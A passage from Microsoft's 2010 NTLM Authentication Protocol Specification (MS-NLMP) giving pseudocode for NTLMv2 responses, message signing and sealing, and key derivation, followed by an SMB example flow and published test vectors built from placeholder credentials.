--   CHALLENGE_MESSAGE.ServerChallenge - The 8-byte challenge message  
     generated by the server.  
--   ResponseKeyNT - Temporary variable to  hold the results of  
     calling NTOWF().  
--   ResponseKeyLM - Temporary variable to hold the results of  
     calling LMGETKEY.  
--   ServerName - The TargetInfo field structure of the  
     CHALLENGE_MESSAGE payload.  
--   KeyExchangeKey - Temporary variabl e to hold the results of  
     calling KXKEY.  
--   HiResponserversion - The 1-byte highest response version  
     understood by the client.  Currently set to 1.  
--   Responserversion - The 1-byte response version. Currently set  
     to 1. 
--  Time - The 8-byte little -endian time in GMT.  
-- 
-- Functions Used:  
--   Z(M) - Defined in section 6.  
 
Define NTOWFv2(Passwd, User, UserDom) as HMAC_MD5(  
MD4(UNICODE(Passwd)), ConcatenationOf( Uppercase(User),  
UserDom ) )  
EndDefine  
 
Define LMOWFv2(Passwd, User, UserDom) as NTOWFv2(Passwd, User,  
UserDom)  
EndDefine  
 
Set ResponseKeyNT to NTOWFv2(Passwd, User, UserDom)  
Set ResponseKeyLM to LMOWFv2(Passwd, User, UserDom)  
 
Define ComputeResponse(NegFlg, ResponseKeyNT, ResponseKeyLM,  
CHALLENGE_MESSAGE.ServerChallenge, ClientChallenge, Time, ServerName)  
as 
Set temp to ConcatenationOf(Responserversion, HiResponserversion,  
Z(6), Time, ClientChallenge, Z(4), ServerName, Z(4))  
Set NTProofStr to HMAC_MD5(ResponseKeyNT,  
ConcatenationOf(CHALLENGE_MESSAGE.ServerChallenge,temp))  
Set NtChallengeResponse to ConcatenationOf(NTProofStr, temp)  
Set LmChallengeResponse to ConcatenationOf(HMAC_MD5(ResponseKeyLM,  
ConcatenationOf(CHALLENGE_MESSAGE.ServerChallenge, ClientChallenge)),  
ClientChallenge )  
 
Set SessionBaseKey to HMAC_MD5(ResponseKeyNT, NTProofStr)  
EndDefine  
On the server, if the user account to be authenticated is hosted in Active Directory, the challenge -
response pair SHOULD be sent to the DC to verify ( [MS-APDS] ). 
The DC calculates the expected value of the response using the NTOWF v2 and/or LMOWF v2, and 
matches it against the response provided. If the response values match, it MUST send back the 
 
61 / 96 
[MS-NLMP] — v20100820   
 NT LAN Manage r (NTLM) Authentication Protocol Specification  
 
 Copyright © 2010 Microsoft Corporation.  
 
 Release: Friday, August 20, 2010  SessionBaseKey; otherwise, it M UST return an error to the calling application. The server MUST 
return an error to the calling application if the DC returns an error. If the DC returns 
STATUS_NTLM_BLOCKED then the server MUST return STATUS_NOT_SUPPORTED.  
If the user account to be authen ticated is hosted locally on the server, the server calculates the 
expected NTOWF v2 and/or LMOWF v2 value of the response using the NTOWF and/or LMOWF 
stored locally, and matches it against the response provided. If the response values match, it MUST 
calculate KeyExchangeKey; otherwise, it MUST return an error to the calling application. <67>  
3.4   Session Security Details  
If it is negotiated, session security provides message integrity (signing) and message confidentiality 
(sealing). When NTLM v2 authentication is not negotiated, only one key  is used for sealing. As a 
result, operations are performed in a half -duplex mode: the client sends a message and then waits 
for a server response. For information on how key exchange, signing, and sealing keys are 
generated, see KXKEY , SIGNKEY , and SEALKEY . 
In connection -oriented mode, messages are assumed to be received in the order sent. The 
application or communications protocol is expected to guarantee this property. As a result, the client 
and server sealing keys are computed only once per session.  
Note   In connectionless mode, messages can arrive out of order. Because of this, the sealing key 
MUST be reset for every message. Rekeying with the same sealing key for multiple messages would 
not maintain message security. Therefore, a per -message sealing key, SealingKey', is computed as 
the MD5 hash of the original sealing key and the message sequence numbe r. The resulting 
SealingKey' value is used to reinitialize the key state structure prior to invoking the following SIGN, 
SEAL, and MAC algorithms. To compute the SealingKey' and initialize the key state structure 
identified by the Handle parameter, use the  following:  
SealingKey' = MD5(ConcatenationOf(SealingKey, SequenceNumber))  
RC4Init(Handle, SealingKey')  
 
3.4.1   Abstract Data Model  
The following define the services provided by the NTLM SSP.  
Note   The following variables are logical, abstract parameters that an implementation has to 
maintain and expose to provide the proper level of service. How these variables are maintained and 
exposed is up to the implementation.  
Integrity: Indicates that the cal ler wishes to construct signed messages so that they cannot be 
tampered with while in transit. If the client requests integrity, then the server MUST respond with 
integrity if supported or MUST NOT respond with integrity if not supported.  
Sequence Detect: Indicates that the caller wishes to construct signed messages such that out -of-
order sequences can be detected. For more information, see section 3.4.2 . 
Confidentiality: Indicates that the caller wishes to  encrypt messages such that they cannot be 
read while in transit. If the client requests confidentiality, then the server MUST respond with 
confidentiality if supported or MUST NOT respond with confidentiality if not supported.  
MessageBlockSize: An integer  that indicates the minimum size of the input_message for 
GSS_WrapEx (section 3.4.6). The size of the input_message MUST be a multiple of this value. 
This value MUST be 1.  
 
62 / 96 
[MS-NLMP] — v20100820   
 NT LAN Manage r (NTLM) Authentication Protocol Specification  
 
 Copyright © 2010 Microsoft Corporation.  
 
 Release: Friday, August 20, 2010  Usage of integrity and confidenti ality is the responsibility of the application:  
If confidentiality is established, then the application MUST call GSS_Wrap() to invoke 
confidentiality with the NTLM SSP. For more information, see section 3.4.3, Message 
Confidentiality.  
If integrity is established, then the application MUST call GSS_GetMIC() to invoke integrity with 
the NTLM SSP. For more information, see section 3.4.2 . 
3.4.2   Message Integrity  
The function to sign a message MUST be calculated as follows:  
-- Input:  
--   SigningKey - The key used to sign the message.  
--   Message - The message being sent between the client and server.  
--   SeqNum - Defined in section 3.1.1.  
--   Handle - The handle to a key state structure corresponding to  
--   the current state of the SealingKey  
-- 
-- Output:      Signed message  
--   Functions used:  
--   ConcatenationOf() - Defined in Section 6.  
--   MAC() - Defined in section 3.4.3.  
 
Define SIGN(Handle, SigningKey, SeqNum, Message) as  
ConcatenationOf(Message, MAC(Handle, SigningKey, SeqNum, Message))  
EndDefine  
The format of the message integrity data that is appended to each message for signing and se aling 
purposes is defined by the NTLMSSP_MESSAGE_SIGNATURE structure (section 2.2.2.9 ). 
Note   If the client is sending the message, the signing key is the one that the client calculated. If 
the server is s ending the message, the signing key is the one that the server calculated. The same 
is true for the sealing key. The sequence number can be explicitly provided by the application 
protocol or by the NTLM security service provider. If the latter is chosen, t he sequence number is 
initialized to zero and then incremented by one for each message sent.  
On receipt, the message authentication code (MAC)  value is computed and compared with the 
received value. If they differ, the message M UST be discarded (section 3.4.4).  
3.4.3   Message Confidentiality  
Message confidentiality, if it is negotiated, also implies message integrity. If message confidentiality 
is negotiated, a sealed (and implicitly signed) message is sent instead of a signed or unsigned 
message. The function that seals a message using the si gning key, sealing key, and message 
sequence number is as follows:  
-- Input:  
--   SigningKey - The key used to sign the message.  
--   Message - The message to be sealed, as provided to the application.  
--   NegFlg, SeqNum - Defined in section 3.1.1.  
--   Handle - The handle to a key state structure corresponding to the  
--   current state of the SealingKey  
-- 
-- Output: 
 
63 / 96 
[MS-NLMP] — v20100820   
 NT LAN Manage r (NTLM) Authentication Protocol Specification  
 
 Copyright © 2010 Microsoft Corporation.  
 
 Release: Friday, August 20, 2010  --   Sealed message – The encrypted message  
--   Signature – The checksum of the Sealed message  
-- 
--   Functions used:  
 
--   RC4() - Defined in Section 6 and 3.1.  
--   MAC() - Defined in Section 3.4.4.1 and 3.4.4.2.  
 
 
   Define SEAL(Handle, SigningKey, SeqNum, Message) as  
     Set Sealed message to RC4(Handle, Message)  
     Set Signature to MAC(Handle, SigningKey, SeqNum, Message)  
     EndDefine  
 
 
Message confidentiality is available in connectionless mode only if the client configures extended 
session security.  
3.4.4   Message Signature Functions  
In the case of connectionless NTLM authentication, the SeqNum  parameter SHOULD be specified by 
the application and the RC4 stream MUST be reinitialized before each message (see section 3.4). 
In the case of connection -oriented authentication, the SeqNum  parameter MUST start at 0 and is 
incremented by one for each message sent. The receiver expects the first received message to have 
SeqNum  equal to 0, and to be one greater for each subsequent message received. If a received 
message does not contain the expected SeqNum , an error MUST be returned to the receiving 
application, and SeqNum  is not incremented.  
3.4.4.1   NTLMv1 without Extended Session Security  
When Extended Session Security (NTLMSSP_NEGOTIATE_EXTENDED_SESSIONSECURITY) is not 
negotiated and session security (NTLMSSP_NEGOTIATE_SIGN or NTLMSSP_NEGOTIATE_SEAL) is 
negotiated, the message signature for NTLM v1 is a 16 -byte value that contains the foll owing 
components, as described by the NTLMSSP_MESSAGE_SIGNATURE structure:  
A 4-byte version -number value that is set to 1.  
A 4-byte random pad.  
The 4 -bytes of the message's CRC32.  
The 4 -byte sequence number (SeqNum).  
If message integrity is negotiated, the  message signature is calculated as follows:  
-- Input:  
--   SigningKey - The key used to sign the message.  
--   SealingKey - The key used to seal the message or checksum.  
--   RandomPad - A random number provided by the client. Typically 0.  
--   Message - The message being sent between the client and server.  
--   SeqNum - Defined in section 3.1.1.  
--   Handle - The handle to a key state structure corresponding to the  
 
64 / 96 
[MS-NLMP] — v20100820   
 NT LAN Manage r (NTLM) Authentication Protocol Specification  
 
 Copyright © 2010 Microsoft Corporation.  
 
 Release: Friday, August 20, 2010  --   current state of the SealingKey  
-- 
-- Output: 
--   An NTLMSSP_MESSAGE_SIGNATURE struc ture whose fields are defined  
     in section 2.2.2.9.  
--   SeqNum - Defined in section 3.1.1.  
-- 
-- Functions used:  
--   ConcatenationOf() - Defined in Section 6.  
--   RC4() - Defined in Section 6.  
--   CRC32() - Defined in Section 6.  
 
Define MAC(Handle , SigningKey, SeqNum, Message) as  
     Set NTLMSSP_MESSAGE_SIGNATURE.Version to 0x00000001  
     Set NTLMSSP_MESSAGE_SIGNATURE.Checksum to CRC32(Message)  
     Set NTLMSSP_MESSAGE_SIGNATURE.RandomPad RC4(Handle, RandomPad)  
     Set NTLMSSP_MESSAGE_SIGNATURE.Checksum to RC4(Handle,  
         NTLMSSP_MESSAGE_SIGNATURE.Checksum)  
     Set NTLMSSP_MESSAGE_SIGNATURE.SeqNum to RC4(Handle, 0x00000000)  
     If (connection oriented)  
          Set NTLMSSP_MESSAGE_SIGNATURE.SeqNum to  
              NTLMSSP_MESSAGE_SIGNATURE.SeqNum XOR SeqNum  
          Set SeqNum to SeqNum + 1  
     Else 
          Set NTLMSSP_MESSAGE_SIGNATURE.SeqNum to  
              NTLMSSP_MESSAGE_SIGNATURE.SeqNum XOR  
              (application supplied SeqNum)  
     Endif 
     Set NTLMSSP_MESSAGE_SIGNATURE.RandomPad to 0  
 
EndDefine  
3.4.4.2   NTLMv1 with Extended Session Security and NTLMv2  
When Extended Session Security (NTLMSSP_NEGOTIATE_EXTENDED_SESSIONSECURITY) is 
negotiated and session security (NTLMSSP_NEGOTIATE_SIGN or NTLMSSP_NEGOTIATE_SEAL) is 
negotiated, the message signature for NTLM v1 is a 16 -byte value that contains the followin g 
components, as described by the NTLMSSP_MESSAGE_SIGNATURE structure:  
A 4-byte version number value that is set to 1.  
A 4-byte random pad.  
The 4 bytes of the message's CRC32.  
The 4 -byte sequence number ( SeqNum ). 
The message signature for NTLM v2 is a 16 -byte value that contains the following components, as 
described by the NTLMSSP_MESSAGE_SIGNATURE structure:  
A 4-byte version -number value that is set to 1.  
The first eight bytes of the message's HMAC_MD5.  
The 4 -byte sequence number ( SeqNum ). 
If message int egrity is negotiated, the message signature is calculated as follows:  
 
65 / 96 
[MS-NLMP] — v20100820   
 NT LAN Manage r (NTLM) Authentication Protocol Specification  
 
 Copyright © 2010 Microsoft Corporation.  
 
 Release: Friday, August 20, 2010  -- Input:  
--   SigningKey - The key used to sign the message.  
--   SealingKey - The key used to seal the message or checksum.  
--   Message - The message being sent between the client an d server.  
--   SeqNum - Defined in section 3.1.1.  
--   Handle - The handle to a key state structure corresponding to the  
--   current state of the SealingKey  
-- 
-- Output: 
--   An NTLMSSP_MESSAGE_SIGNATURE structure whose fields are defined  
     in sectio n 2.2.2.9.  
--   SeqNum - Defined in section 3.1.1.  
-- 
-- Functions used:  
--   ConcatenationOf() - Defined in Section 6.  
--   RC4() - Defined in Section 6.  
--   HMAC_MD5() - Defined in Section 6.  
 
Define MAC(Handle, SigningKey, SeqNum, Message) as  
     Set NTLMSSP_MESSAGE_SIGNATURE.Version to 0x00000001  
     Set NTLMSSP_MESSAGE_SIGNATURE.Checksum to  
         HMAC_MD5(SigningKey,  
         ConcatenationOf(SeqNum, Message))[0..7]  
     Set NTLMSSP_MESSAGE_SIGNATURE.SeqNum to SeqNum  
     Set SeqNum to S eqNum + 1  
EndDefine  
If a key exchange key is negotiated, the message signature for the NTLM security service provider is 
the same as in the preceding description, except the 8 bytes of the HMAC_MD5 are encrypted with 
RC4, as follows:  
 
Define MAC(Handle, S igningKey, SeqNum, Message) as  
     Set NTLMSSP_MESSAGE_SIGNATURE.Version to 0x00000001  
     Set NTLMSSP_MESSAGE_SIGNATURE.Checksum to RC4(Handle,   
     HMAC_MD5(SigningKey, ConcatenationOf(SeqNum, Message))[0..7])  
     Set NTLMSSP_MESSAGE_SIGNATURE.SeqN um to SeqNum  
     Set SeqNum to SeqNum + 1  
EndDefine  
3.4.5   KXKEY, SIGNKEY, and SEALKEY  
This topic specifies how key exchange ( KXKEY ), signing ( SIGNKEY ), and sealing ( SEALKEY ) keys are 
generated.  
3.4.5.1   KXKEY  
If NTLM v1 is used and extended session security is not negotiated, the 128 -bit key exchange key 
value is calculated as follows:  
-- Input:      
--   SessionBaseKey - A session key calculated from the user's  
     password.  
--   LmChallengeResponse - The LM response to the server challenge.  
     Computed by the client.  
 
66 / 96 
[MS-NLMP] — v20100820   
 NT LAN Manage r (NTLM) Authentication Protocol Specification  
 
 Copyright © 2010 Microsoft Corporation.  
 
 Release: Friday, August 20, 2010  --   NegFlg - Defined in section 3.1.1.  
-- 
-- Output:      
--   KeyExchangeKey - The Key Exchange Key.  
-- 
-- Functions used:  
--   ConcatenationOf() - Defined in Section 6.  
--   DES() - Defined in Section 6.  
 
Define KXKEY(SessionBaseKey, LmChallengeResponse, ServerChallenge) as  
If ( NTLMSSP_NEGOTIATE_LMKEY flag is set in NegFlg)  
     Set KeyExchangeKey to ConcatenationOf(DES(SessionBaseKey[0..6],  
     LmChallengeResponse[0..7]),  
     DES(ConcatenationOf(SessionBaseKey[7], 0xBDBDBDBDBDBD),   
     LmChallengeResponse[0..7]))   
Else 
     If ( NTLMSSP_REQUEST_NON_NT_SESSION_KEY flag is set in NegFlg)  
        Set KeyExchangeKey to ConcatenationOf(LMOWF[0..7], Z(8 )),  
     Else 
        Set KeyExchangeKey to SessionBaseKey  
     Endif 
Endif 
EndDefine  
 
If NTLM v1 is used and extended session security is negotiated, the key exchange key value is 
calculated as follows:  
-- Input:      
--   SessionBaseKey - A session key calculated from the user's  
     password.  
--   ServerChallenge - The 8-byte challenge message  
     generated by the server.  
--   LmChallengeResponse - The LM response to the server challenge.  
     Computed by the client .  
-- 
-- Output:      
--   KeyExchangeKey - The Key Exchange Key.  
-- 
-- Functions used:  
--   ConcatenationOf() - Defined in Section 6.  
--   HMAC_MD5() - Defined in Section 6.  
 
Define KXKEY(SessionBaseKey, LmChallengeResponse, ServerChallenge) as  
     Set KeyExchangeKey to HMAC_MD5(SessionBaseKey, ConcatenationOf(ServerChallenge, 
LmChallengeResponse [0..7]))  
EndDefine  
 
If NTLM v2 is used, the key exchange key MUST be the 128 -bit session base key.  
3.4.5.2   SIGNKEY  
If extended session security is not negotiated (section 2.2.2.5 ), then no signing keys are available 
and message signing is not supported.  
 
67 / 96 
[MS-NLMP] — v20100820   
 NT LAN Manage r (NTLM) Authentication Protocol Specification  
 
 Copyright © 2010 Microsoft Corporation.  
 
 Release: Friday, August 20, 2010  If extended session security is negotiated, the signing key is a 128 -bit value that is calculated as 
follows from the random session key and the null -terminated ASCII constants shown.  
-- Input:      
--   RandomSessionKey - A randomly generated session key.  
--   NegFlg - Defined in section 3.1.1.  
--   Mode - An enum that defines the local machine performing  
     the computation.   
     Mode always takes the value "Client" or "Server.  
-- 
-- Output:      
--   SignKey - The key used for signing messages.  
-- 
-- Functions used:  
--   ConcatenationOf(), MD5(), NIL - Defined in Section 6.  
 
Define SIGNKEY(NegFlg, RandomSessionKey, Mode) as  
If (NTLMSSP_NEGOTIATE_EXTENDED_SESSIONSECURITY flag is set in NegFlg)  
     If (Mode equals "Client")  
          Set SignKey to MD 5(ConcatenationOf(RandomSessionKey,  
          "session key to client -to-server signing key magic   
          constant"))  
     Else 
          Set SignKey to MD5(ConcatenationOf(RandomSessionKey,  
          "session key to server -to-client signing key magic  
          constant"))  
     Endif 
Else  
     Set  SignKey to NIL  
Endif 
EndDefine  
3.4.5.3   SEALKEY  
The sealing key function produces an encryption key from the random session key and the null -
terminated ASCII constants shown.  
If extended session security  is negotiated, the sealing key has either 40, 56, or 128 bits of 
entropy stored in a 128 -bit value.  
If extended session security is not negotiated, the sealing key has either 40 or 56 bits of entropy 
stored in a 64 -bit value.  
Note   The MD5 hashes complete ly overwrite and fill the 64 -bit or 128 -bit value.  
-- Input:      
--   RandomSessionKey - A randomly generated session key.  
--   NegFlg - Defined in section 3.1.1.  
--   Mode - An enum that defines the local machine performing  
     the computation.  
     Mode always takes the value "Client" or "Server.  
-- 
-- Output:      
--   SealKey - The key used for sealing messages.  
-- 
-- Functions used:  
--   ConcatenationOf(), MD5() - Defined in Section 6.  
 
68 / 96 
[MS-NLMP] — v20100820   
 NT LAN Manage r (NTLM) Authentication Protocol Specification  
 
 Copyright © 2010 Microsoft Corporation.  
 
 Release: Friday, August 20, 2010   
Define SEALKEY(NegotiateFlags, RandomSessionKey, Mode) as  
If (NTLMSSP_NEGOTIATE_EXTENDED_SESSIONSECURITY flag is set in NegFlg)  
     If ( NTLMSSP_NEGOTIATE_128 is set in NegFlg)  
          Set SealKey to RandomSessionKey  
     ElseIf ( NTLMSSP_NEGOTIATE_56 flag is set in NegFlg)  
         Set SealKey to RandomSessionKe y[0..6] 
     Else  
         Set SealKey to RandomSessionKey[0..4]  
     Endif 
 
     If (Mode equals "Client")  
         Set SealKey to MD5(ConcatenationOf(SealKey, "session key to  
         client-to-server sealing key magic constant"))  
     Else 
         Set SealKey to MD5(ConcatenationOf(SealKey, "session key to  
         server-to-client sealing key magic constant"))  
     Endif 
ElseIf (NTLMSSP_NEGOTIATE_56 flag is set in NegFlg)  
     Set SealKey to ConcatenationOf(RandomSessionKey[0..6], 0xA0)  
Else 
     Set SealKey to ConcatenationOf(RandomSessionKey[0..4], 0xE5,  
     0x38, 0xB0)  
Endif          
EndDefine  
3.4.6   GSS_WrapEx() Call  
This call is an extension to GSS_Wrap  [RFC2743]  that passes multiple buffers. The Microsoft 
implementation of GSS_WrapEx()  is called EncryptMessage() . For more information, see [MSDN -
EncryptMsg] .  
Inputs:  
context_handle CONTEXT HANDLE  
qop_req INTEGER, -- 0 specifies default QOP  
input_message ORDERED LIST of:  
conf_req_flag BOOLEAN  
sign BOOLEAN  
data OCTET STRING  
Outputs:  
major_status INTEGER  
minor_status INTEGER  
output_message ORDERED LIST (in same order as input_message) of:  
conf_state BOOLEAN  
signed BOOLEAN  
 
69 / 96 
[MS-NLMP] — v20100820   
 NT LAN Manage r (NTLM) Authentication Protocol Specification  
 
 Copyright © 2010 Microsoft Corporation.  
 
 Release: Friday, August 20, 2010  data OCTET STRING  
signature OCTET STRING  
This call is identical to GSS_Wrap , except that it supports multiple input buffers.  
The input data can be a list of security buffers. The caller can request encryption by setting fQOP  to 
0. If the caller requests just signing the input data messages and no encryption will be performed, it 
sets the fQOP  parameter as SECQOP_WRAP_NO_ENCRYPT (0x80000001).  
Input data buffers for which conf_req_flag==TRUE are encrypted (section 3.4.3, Message 
Confidentiality) in output_message.  
For NTLMv1, input data buffers for which sign==TRUE are included in the message signature. For 
NTLMv2, all input data buffers are included in the message signature (section 3.4.6.1 ). 
3.4.6.1   Signature Creation for GSS_WrapEx()  
Section 3.4.3  describes the algorithm used by GSS_WrapEx() to create the signature. The signature 
contains the NTLMSSP_MESSAGE_SIGNATURE structure (section 2.2.2.9 ). 
The checksum is computed over the concatenated input buffers using only the input data buffers 
where sign==TRUE for NTLMv1 and all of the input data buffers for NTLMv2, including the cleartext 
data buffers.  
3.4.7   GSS_UnwrapEx() Call  
This call is an extension to GSS_Unwrap [RFC2743]  that passes multiple buffers. The Microsoft 
implementation of GSS_WrapEx() is called DecryptMessage() . For more information, see [MSDN -
DecryptMsg] . 
Inputs:  
context_handle CONTEXT HANDLE  
input_message ORDERED LIST of:  
conf_state BOOLEAN  
signed BOOLEAN  
data OCTET STRING  
signature OCTET STRING  
Outpu ts: 
qop_req INTEGER, -- 0 specifies default QOP  
major_status INTEGER  
minor_status INTEGER  
output_message ORDERED LIST (in same order as input_message) of:  
conf_state BOOLEAN  
data OCTET STRING  
 
70 / 96 
[MS-NLMP] — v20100820   
 NT LAN Manage r (NTLM) Authentication Protocol Specification  
 
 Copyright © 2010 Microsoft Corporation.  
 
 Release: Friday, August 20, 2010  This call is identical to GSS_Unwrap , except that it supports m ultiple input buffers. Input data 
buffers having conf_state==TRUE are decrypted in the output_message. For NTLMv1, all input data 
buffers where signed==TRUE are concatenated together and the signature is verified against the 
resulting concatenated buffer. For NTLMv2, the signature is verified for all of the input data buffers.  
3.4.8   GSS_GetMICEx() Call  
Inputs:  
context_handle CONTEXT HANDLE  
qop_req INTEGER, -- 0 specifies default QOP  
message ORDERED LIST of:  
sign BOOLEAN  
data OCTET STRING  
Outputs:  
major_status INTEGER  
minor_status INTEGER  
message ORDERED LIST of:  
signed BOOLEAN  
data OCTET STRING  
per_msg_token OCTET STRING  
This call is identical to GSS_GetMIC(), except that it supports multiple input buffers.  
3.4.8.1   Signature Creation for GSS_GetMICEx()  
Section 3.4.3  describes the algorithm used by GSS_GetMICEx() to create the signature. The 
per_msg_token contains the NTLMSSP_MESSAGE_SIGNATURE structure (section 2.2.2.9 ). 
The checksum is computed over the concatenated  input buffers using only the input data buffers 
where sign==TRUE for NTLMv1 and all of the input data buffers including the buffers where 
sign==FALSE for NTLMv2.  
3.4.9   GSS_VerifyMICEx() Call  
Inputs:  
context_handle CONTEXT HANDLE  
message ORDERED LIST of:  
signed BOOLEAN  
data OCTET STRING  
per_msg_token OCTET STRING  
 
71 / 96 
[MS-NLMP] — v20100820   
 NT LAN Manage r (NTLM) Authentication Protocol Specification  
 
 Copyright © 2010 Microsoft Corporation.  
 
 Release: Friday, August 20, 2010  Outputs:  
qop_state INTEGER  
major_status INTEGER  
minor_status INTEGER  
This call is identical to GSS_VerifyMIC(), except that it supports multiple input buffers.  
For NTLMv1, all input data buffers where signed==TRUE are concatenated together and the 
signature is verified against the resulting concatenated buffer. For NTLMv2, the signature is verified 
for all of the input data buffers including the buffers where signed==FALSE.  
 
72 / 96 
[MS-NLMP] — v20100820   
 NT LAN Manage r (NTLM) Authentication Protocol Specification  
 
 Copyright © 2010 Microsoft Corporation.  
 
 Release: Friday, August 20, 2010  4   Protocol Examples  
4.1   NTLM Over Server Message Block (SMB)  
NTLM over a Server Message Block (SMB) transport is one of the most common uses of NTLM 
authentication and encryption. KILE is the preferred authentication method of an SMB session  in 
Microsoft Windows®  2000 Server operating system, Windows®  XP operating system, Windows 
Server®  2003 operating system, Windows  Vista® operating system, and Windows Server®  2008 
operating system. However, when a client attempts to authenticate to an SMB server using the KILE 
protocol and fails, it can attempt to authenticate with NTLM.  
The following is an example protocol flow of NTLM and Simple and Protected Generic Security 
Service Application Program Interface Negotiation Mechanism (SPNEGO) ( [MS-SPNG] ) 
authentication of an SMB session.  
Note   The NTLM messages are embedded in the SMB messages. For details about how SMB embeds 
NTLM messages, see [MS-SMB]  section 4.1.  
 
Figure 4: Message sequence to authenticate an SMB session  
Steps 1 and 2:  The SMB protocol negotiates protocol -specific options using the 
SMB_COM_NEGOTIATE request and response messages.  
Step 3:  The client sends an SMB_COM_SESSION_SETUP_ANDX request mess age. Assuming that 
NTLM authentication is negotiated, within this message an NTLM NEGOTIATE_MESSAGE  is 
embedded.  
Step 4:  The server responds with an SMB_COM_SESSION_SETUP_ANDX response message within 
which  an NTLM CHALLENGE_MESSAGE  is embedded. The message includes an 8 -byte random 

 
73 / 96 
[MS-NLMP] — v20100820   
 NT LAN Manage r (NTLM) Authentication Protocol Specification  
 
 Copyright © 2010 Microsoft Corporation.  
 
 Release: Friday, August 20, 2010  number, called a "challenge", that the server generates and sends in the ServerChallenge  field of 
the message.  
Step 5:  The clie nt extracts the ServerChallenge  field from the NTLM CHALLENGE_MESSAGE and 
sends an NTLM AUTHENTICATE_MESSAGE  to the server (embedded in an 
SMB_COM_SESSION_SETUP_ANDX request message).  
If the challenge and the response prove that the client knows the user's password, the 
authentication succeeds and the client's security context is now established on the server.  
Step 6:  The server sends a success message embedded in an SMB_COM_SESSION_SETUP_ANDX 
response mess age. 
4.2   Cryptographic Values for Validation  
The topics in this section contain Byte Array values which can be used when validating NTLM 
cryptographic implementations.  
4.2.1   Common Values  
These values are used in multiple examples.  
User:  
0000000: 55 00 73 00 65 00 72 00                           U.s.e.r.  
0000000: 55 00 53 00 45 00 52 00                           U.S.E.R.  
0000000: 55 73 65 72                                       User  
 
UserDom:  
0000000: 44 00 6f 00 6d 00 61 00 69 00 6e 00               D.o.m.a.i.n.  
Passwd:  
0000000: 50 00 61 00 73 00 73 00 77 00 6f 00 72 00 64 00   P.a.s.s.w.o.r.d.  
0000000: 50 41 53 53 57 4f  52 44 00 00 00 00 00 00         PASSWORD......  
 
Server Name:  
00000000: 53 00 65 00 72 00 76 00 65 00 72 00              S.e.r.v.e.r.  
Workstation Name:  
0000000: 43 00 4f 00 4d 00 50 00 55 00 54 00 45 00 52 00   C.O.M.P.U.T.E.R.  
RandomSessionKey:  
0000000: 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55   UUUUUUUUUUUUUUUU  
 
74 / 96 
[MS-NLMP] — v20100820   
 NT LAN Manage r (NTLM) Authentication Protocol Specification  
 
 Copyright © 2010 Microsoft Corporation.  
 
 Release: Friday, August 20, 2010  Time:  
0000000: 00 00 00 00 00 00 00 00                           ........  
ClientChallenge:  
0000000: aa aa aa aa aa aa aa aa                           ........  
ServerChallenge:  
0000000: 01 2 3 45 67 89 ab cd ef                           .#Eg..&#x2550;.  
4.2.2   NTLM v1 Authentication  
The following calculations are used in section 3.3.1. 
The Challenge Flags used in the following NTLM v1 examples are:  
NTLMSSP_NEGOTIATE_KEY_EXCH  
NTLMSSP_NEGOTIATE_56  
NTLMSSP_NEGOTIATE_128  
NTLMSSP_NEGOTIATE_VERSION  
NTLMSSP_TARGET_TYPE_SERVER  
NTLMSSP_NEGOTIATE_ALWAYS_SIGN  
NTLM NTLMSSP_NEGOTIATE_NTLM  
NTLMSSP_NEGOTIATE_SEAL  
NTLMSSP_NEGOTIATE_SIGN  
NTLM_NEGOTIATE_OEM  
NTLMSSP_NEGOTIATE_UNICODE  
0000000: 33 82 02 e2                                       3... 
4.2.2.1   Calculations  
4.2.2.1.1   LMOWFv1()  
The LMOWFv1() is defined in section 3.3.1. 
 
DES( UpperCase( Passwd)[0..6],"KGS!@#$%"):  
0000000: e5 2c ac 67 41 9a 9a 22                           .,.gA.."  
DES( UpperCase( Passwd)[7..13],"KGS!@#$%"):  
0000000: 4a 3b 10 8f 3f a6 cb 6d                           J;..?..m  
 
75 / 96 
[MS-NLMP] — v20100820   
 NT LAN Manage r (NTLM) Authentication Protocol Specification  
 
 Copyright © 2010 Microsoft Corporation.  
 
 Release: Friday, August 20, 2010   
When calculating the LMOWFv1 using the values above, then LMOWFv1("Password", "User", 
"Domain") is:  
0000000: e5 2c ac 67 41 9a 9a 22 4a 3b 10 8 f 3f a6 cb 6d   ...gA.."J;..?..m  
4.2.2.1.2   NTOWFv1()  
The NTOWFv1() is defined in section 3.3.1. When calculating the NTOWFv1 using the values above, 
then NTOWFv1("Password", "User", "Domain") is:  
0000000: a4 f4 9c 40 65 10 bd ca b6 82 4e e7 c3 0f d8 52   ...@e.....N....R  
4.2.2.1.3   Session Base Key and Key Exchange Key  
The SessionBaseKey is specified in section 3.3.1. 
0000000: d8 72 62 b0 cd e4 b1 cb 74 99 be cc cd f1 07 84   .rb.&#x2550;...t...&#x2550;...  
4.2.2.2   Results  
4.2.2.2.1   NTLMv1 Response  
The NTChallengeResponse is specified in section 3.3.1 . With 
NTLMSSP_NEGOTIATE_EXTENDED_SESSIONSECURITY not set, using the values above, the result 
is: 
0000000: 67 c4 30 11 f3 02 98 a2 ad 35 ec e6 4f 16 33 1c   g&#x2500;0......5..O.3.  
0000010: 44 bd be d9 27 84 1f 94                           D...'...  
 
4.2.2.2.2   LMv1 Response  
The LmChallengeResponse is specified in section 3.3.1 . With 
NTLMSSP_NEGOTIATE_EXTENDED_SESSIONSECURITY not set, using the values above, the result 
is: 
0000000: 98 de f7 b8 7f 88 aa 5d af e2 df 77 96 88 a1 72   .......].......r  
0000010: de f1 1c 7d 5c cd ef 13                           ...} \&#x2550;..  
 
NTLMSSP_NEGOTIATE_LM_KEY is set:  
0000000: b0 9e 37 9f 7f be cb 1e af 0a fd cb 03 83 c8 a0   ..7......... .... 
 
76 / 96 
[MS-NLMP] — v20100820   
 NT LAN Manage r (NTLM) Authentication Protocol Specification  
 
 Copyright © 2010 Microsoft Corporation.  
 
 Release: Friday, August 20, 2010  4.2.2.2.3   Encrypted Session Key  
RC4 encryption of the RandomSessionKey with the KeyExchangeKey:  
0000000: 51 88 22 b1 b3 f3 50 c8 95 86 82 ec bb 3e 3c b7   Q."...P......&gt;&lt;.  
NTLMSSP_REQUEST_NON_NT_SESSION_KEY is set:  
0000000: 74 52 ca 55 c2 25 a1 ca 04 b4 8f ae 32 cf 56 fc   tR.U........2.V.  
NTLMSSP_NEGOTIATE_LM_KEY is set:  
0000000: 4c d7 bb 57 d6 97 ef 9b 54 9f 02 b8 f9 b3 78 64   L..W....T.....xd  
4.2.2.3   Messages  
The CHALLENGE_MESSAGE  (section 2.2.1.2 ): 
 
